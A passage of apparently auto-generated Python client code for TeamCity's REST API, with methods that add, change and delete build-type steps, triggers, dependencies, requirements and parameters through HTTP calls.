all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_snapshot_dep" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `add_snapshot_dep`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/snapshot-dependencies', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotDependency', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __add_step_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""add_step # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__add_step_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:param Step body:
:return: Step
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_step" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `add_step`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/steps', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Step', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __add_step_parameter_with_http_info(self, bt_locator, step_id, parameter_name, **kwargs): # noqa: E501
"""add_step_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__add_step_parameter_with_http_info(bt_locator, step_id, parameter_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str parameter_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'step_id', 'parameter_name', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_step_parameter" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `add_step_parameter`") # noqa: E501
# verify the required parameter 'step_id' is set
if ('step_id' not in params or
params['step_id'] is None):
raise ValueError("Missing the required parameter `step_id` when calling `add_step_parameter`") # noqa: E501
# verify the required parameter 'parameter_name' is set
if ('parameter_name' not in params or
params['parameter_name'] is None):
raise ValueError("Missing the required parameter `parameter_name` when calling `add_step_parameter`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'step_id' in params:
if isinstance(params['step_id'], TeamCityObject):
path_params['stepId'] = params['step_id'].locator_id
else:
path_params['stepId'] = params['step_id'] # noqa: E501
if 'parameter_name' in params:
if isinstance(params['parameter_name'], TeamCityObject):
path_params['parameterName'] = params['parameter_name'].locator_id
else:
path_params['parameterName'] = params['parameter_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/steps/{stepId}/parameters/{parameterName}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __add_template_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""add_template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__add_template_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param BuildType body:
:param bool optimize_settings:
:param str fields:
:return: BuildType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'body', 'optimize_settings', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_template" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `add_template`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'optimize_settings' in params:
query_params.append(('optimizeSettings', params['optimize_settings'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/templates', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BuildType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __add_trigger_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""add_trigger # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__add_trigger_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:param Trigger body:
:return: Trigger
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_trigger" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `add_trigger`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/triggers', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Trigger', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __add_vcs_root_entry_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""add_vcs_root_entry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__add_vcs_root_entry_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param VcsRootEntry body:
:param str fields:
:return: VcsRootEntry
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_vcs_root_entry" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `add_vcs_root_entry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs-root-entries', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VcsRootEntry', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __change_artifact_dep_setting_with_http_info(self, bt_locator, artifact_dep_locator, field_name, **kwargs): # noqa: E501
"""change_artifact_dep_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__change_artifact_dep_setting_with_http_info(bt_locator, artifact_dep_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str artifact_dep_locator: (required)
:param str field_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'artifact_dep_locator', 'field_name', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method change_artifact_dep_setting" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `change_artifact_dep_setting`") # noqa: E501
# verify the required parameter 'artifact_dep_locator' is set
if ('artifact_dep_locator' not in params or
params['artifact_dep_locator'] is None):
raise ValueError("Missing the required parameter `artifact_dep_locator` when calling `change_artifact_dep_setting`") # noqa: E501
# verify the required parameter 'field_name' is set
if ('field_name' not in params or
params['field_name'] is None):
raise ValueError("Missing the required parameter `field_name` when calling `change_artifact_dep_setting`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'artifact_dep_locator' in params:
if isinstance(params['artifact_dep_locator'], TeamCityObject):
path_params['artifactDepLocator'] = params['artifact_dep_locator'].locator_id
else:
path_params['artifactDepLocator'] = params['artifact_dep_locator'] # noqa: E501
if 'field_name' in params:
if isinstance(params['field_name'], TeamCityObject):
path_params['fieldName'] = params['field_name'].locator_id
else:
path_params['fieldName'] = params['field_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/artifact-dependencies/{artifactDepLocator}/{fieldName}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __change_feature_setting_with_http_info(self, bt_locator, feature_id, name, **kwargs): # noqa: E501
"""change_feature_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__change_feature_setting_with_http_info(bt_locator, feature_id, name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'feature_id', 'name', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method change_feature_setting" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `change_feature_setting`") # noqa: E501
# verify the required parameter 'feature_id' is set
if ('feature_id' not in params or
params['feature_id'] is None):
raise ValueError("Missing the required parameter `feature_id` when calling `change_feature_setting`") # noqa: E501
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `change_feature_setting`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'feature_id' in params:
if isinstance(params['feature_id'], TeamCityObject):
path_params['featureId'] = params['feature_id'].locator_id
else:
path_params['featureId'] = params['feature_id'] # noqa: E501
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/features/{featureId}/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __change_requirement_setting_with_http_info(self, bt_locator, agent_requirement_locator, field_name, **kwargs): # noqa: E501
"""change_requirement_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__change_requirement_setting_with_http_info(bt_locator, agent_requirement_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str agent_requirement_locator: (required)
:param str field_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'agent_requirement_locator', 'field_name', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method change_requirement_setting" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `change_requirement_setting`") # noqa: E501
# verify the required parameter 'agent_requirement_locator' is set
if ('agent_requirement_locator' not in params or
params['agent_requirement_locator'] is None):
raise ValueError("Missing the required parameter `agent_requirement_locator` when calling `change_requirement_setting`") # noqa: E501
# verify the required parameter 'field_name' is set
if ('field_name' not in params or
params['field_name'] is None):
raise ValueError("Missing the required parameter `field_name` when calling `change_requirement_setting`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'agent_requirement_locator' in params:
if isinstance(params['agent_requirement_locator'], TeamCityObject):
path_params['agentRequirementLocator'] = params['agent_requirement_locator'].locator_id
else:
path_params['agentRequirementLocator'] = params['agent_requirement_locator'] # noqa: E501
if 'field_name' in params:
if isinstance(params['field_name'], TeamCityObject):
path_params['fieldName'] = params['field_name'].locator_id
else:
path_params['fieldName'] = params['field_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/agent-requirements/{agentRequirementLocator}/{fieldName}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __change_step_setting_with_http_info(self, bt_locator, step_id, field_name, **kwargs): # noqa: E501
"""change_step_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__change_step_setting_with_http_info(bt_locator, step_id, field_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str field_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'step_id', 'field_name', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method change_step_setting" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `change_step_setting`") # noqa: E501
# verify the required parameter 'step_id' is set
if ('step_id' not in params or
params['step_id'] is None):
raise ValueError("Missing the required parameter `step_id` when calling `change_step_setting`") # noqa: E501
# verify the required parameter 'field_name' is set
if ('field_name' not in params or
params['field_name'] is None):
raise ValueError("Missing the required parameter `field_name` when calling `change_step_setting`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'step_id' in params:
if isinstance(params['step_id'], TeamCityObject):
path_params['stepId'] = params['step_id'].locator_id
else:
path_params['stepId'] = params['step_id'] # noqa: E501
if 'field_name' in params:
if isinstance(params['field_name'], TeamCityObject):
path_params['fieldName'] = params['field_name'].locator_id
else:
path_params['fieldName'] = params['field_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/steps/{stepId}/{fieldName}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __change_trigger_setting_with_http_info(self, bt_locator, trigger_locator, field_name, **kwargs): # noqa: E501
"""change_trigger_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__change_trigger_setting_with_http_info(bt_locator, trigger_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str trigger_locator: (required)
:param str field_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'trigger_locator', 'field_name', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method change_trigger_setting" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `change_trigger_setting`") # noqa: E501
# verify the required parameter 'trigger_locator' is set
if ('trigger_locator' not in params or
params['trigger_locator'] is None):
raise ValueError("Missing the required parameter `trigger_locator` when calling `change_trigger_setting`") # noqa: E501
# verify the required parameter 'field_name' is set
if ('field_name' not in params or
params['field_name'] is None):
raise ValueError("Missing the required parameter `field_name` when calling `change_trigger_setting`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'trigger_locator' in params:
if isinstance(params['trigger_locator'], TeamCityObject):
path_params['triggerLocator'] = params['trigger_locator'].locator_id
else:
path_params['triggerLocator'] = params['trigger_locator'] # noqa: E501
if 'field_name' in params:
if isinstance(params['field_name'], TeamCityObject):
path_params['fieldName'] = params['field_name'].locator_id
else:
path_params['fieldName'] = params['field_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/triggers/{triggerLocator}/{fieldName}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_agent_requirement_with_http_info(self, bt_locator, agent_requirement_locator, **kwargs): # noqa: E501
"""delete_agent_requirement # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_agent_requirement_with_http_info(bt_locator, agent_requirement_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str agent_requirement_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'agent_requirement_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_agent_requirement" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_agent_requirement`") # noqa: E501
# verify the required parameter 'agent_requirement_locator' is set
if ('agent_requirement_locator' not in params or
params['agent_requirement_locator'] is None):
raise ValueError("Missing the required parameter `agent_requirement_locator` when calling `delete_agent_requirement`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'agent_requirement_locator' in params:
if isinstance(params['agent_requirement_locator'], TeamCityObject):
path_params['agentRequirementLocator'] = params['agent_requirement_locator'].locator_id
else:
path_params['agentRequirementLocator'] = params['agent_requirement_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/agent-requirements/{agentRequirementLocator}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_all_parameters_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""delete_all_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_all_parameters_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_all_parameters" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_all_parameters`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_all_parameters_0_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""delete_all_parameters_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_all_parameters_0_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_all_parameters_0" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_all_parameters_0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_artifact_dep_with_http_info(self, bt_locator, artifact_dep_locator, **kwargs): # noqa: E501
"""delete_artifact_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_artifact_dep_with_http_info(bt_locator, artifact_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str artifact_dep_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
